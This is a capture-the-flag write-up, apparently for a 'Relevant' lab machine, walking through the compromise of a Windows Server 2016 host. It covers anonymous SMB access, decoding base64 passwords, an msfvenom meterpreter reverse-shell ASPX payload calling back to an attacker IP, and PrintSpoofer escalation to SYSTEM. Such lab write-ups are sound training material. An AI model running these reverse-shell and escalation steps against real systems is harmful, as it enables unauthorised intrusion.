Relevant

Reconnaissance

First, we will begin with our usual nmap scan to see where we can start looking.

NMAP output

Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-22 04:18 CET
Nmap scan report for 10.10.218.69
Host is up (0.093s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE        VERSION
80/tcp   open  http           Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc          Microsoft Windows RPC
139/tcp  open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds   Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open  ms-wbt-server?
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2021-12-21T03:13:52
|_Not valid after:  2022-06-22T03:13:52
| rdp-ntlm-info:
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2021-12-22T03:20:37+00:00
|_ssl-date: 2021-12-22T03:21:15+00:00; 0s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h36m00s, deviation: 3h34m42s, median: 0s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2021-12-22T03:20:37
|_  start_date: 2021-12-22T03:14:38
| smb-os-discovery:
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT
|   Workgroup: WORKGROUP
|_  System time: 2021-12-21T19:20:39-08:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.73 seconds

From this, we see the web application is running on Microsoft Server IIS, not too bad.

Another important thing, looks like samba is also running without authentication.

Scanning

Looks like samba is running without authentication enabled and there's also an interesting share.

smbclient -L /10.10.218.69/

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        nt4wrksv        Disk

Now we just have to connect to it and see what's happening.

smbclient //10.10.218.69/nt4wrksv

Password for [WORKGROUP\max]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 25 23:46:04 2020
  ..                                  D        0  Sat Jul 25 23:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 17:15:33 2020

                7735807 blocks of size 4096. 4945463 blocks available
smb: \> cat passwords.txt
cat: command not found
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

Looks like we are lucky, we got a encrypted passwords text file, so let's see what's in it.

cat passwords.txt

User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

Exploiting

Now that we have encoded passwords, we need to decrypt them. For that I used this website.

After decoding both, we are left with 2 users:

Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$

Scanning a little more, I didn't find anywhere to use these credentials, so I started digging a bit.

After another nmap scan, this time with the -p- flag, we find another http port 49663 with a directory same name as the share. This means we can easily upload a reverse shell and invoke it going to the page. So first, let's generate the reverse shell payload.

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.8.208.63 lport=1337 -f aspx -o 1337.aspx

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 200262 bytes
Final size of aspx file: 1010404 bytes
Saved as: 1337.aspx

Perfect, so before uploading that to the SMB share we need to start a listener with metasploit.

Using metasploit as a listener for the afore created reverse shell

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v6.1.8-dev                           ]
+ -- --=[ 2167 exploits - 1149 auxiliary - 397 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Writing a custom module? After editing your
module, why not try the reload command

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.8.208.63
LHOST => 10.8.208.63
msf6 exploit(multi/handler) > set LPORT 1337
LPORT => 1337
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.8.208.63:1337

Now we can finally connect to the share, upload our payload and get the reverse shell in meterpreter navigating to the webpage.

curl http://relevant.thm:59663/nt4wrksv/1337.aspx

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.8.208.63:1337
[*] Meterpreter session 7 opened (10.8.208.63:1337 -> 10.10.232.253:49773) at 2021-12-22 05:24:46 +0100

meterpreter > whoami /priv
[-] Unknown command: whoami
meterpreter > shell
Process 2284 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>

Looks like we are finally inside the server, now go grab the user flag at C:\Users\Bob\Desktop\user.txt and let's move to getting root.

Privilege Escalation

So we are now inside the server with a user called iis apppool\defaultapppool.

Taking a closer look at the privileges we have, SeImpersonatePrivilege is kinda suspicious, and that's because there's a famous exploit called PrintSpoofer that abuses that privilege to escalate privileges.

First, let's get the exe from here and upload it to the SMB share again.

After that, we just navigate to the share directory inside our reverse shell and execute the file.

PrintSpoofer.exe -i -c powershell.exe

PrintSpoofer.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32>

Well, looks like that's it. Just go and grab the flag at C:\Users\Administrator\Desktop\root.txt.

Hope you enjoyed it!

On this page

Reconnaissance Scanning Exploiting Privilege Escalation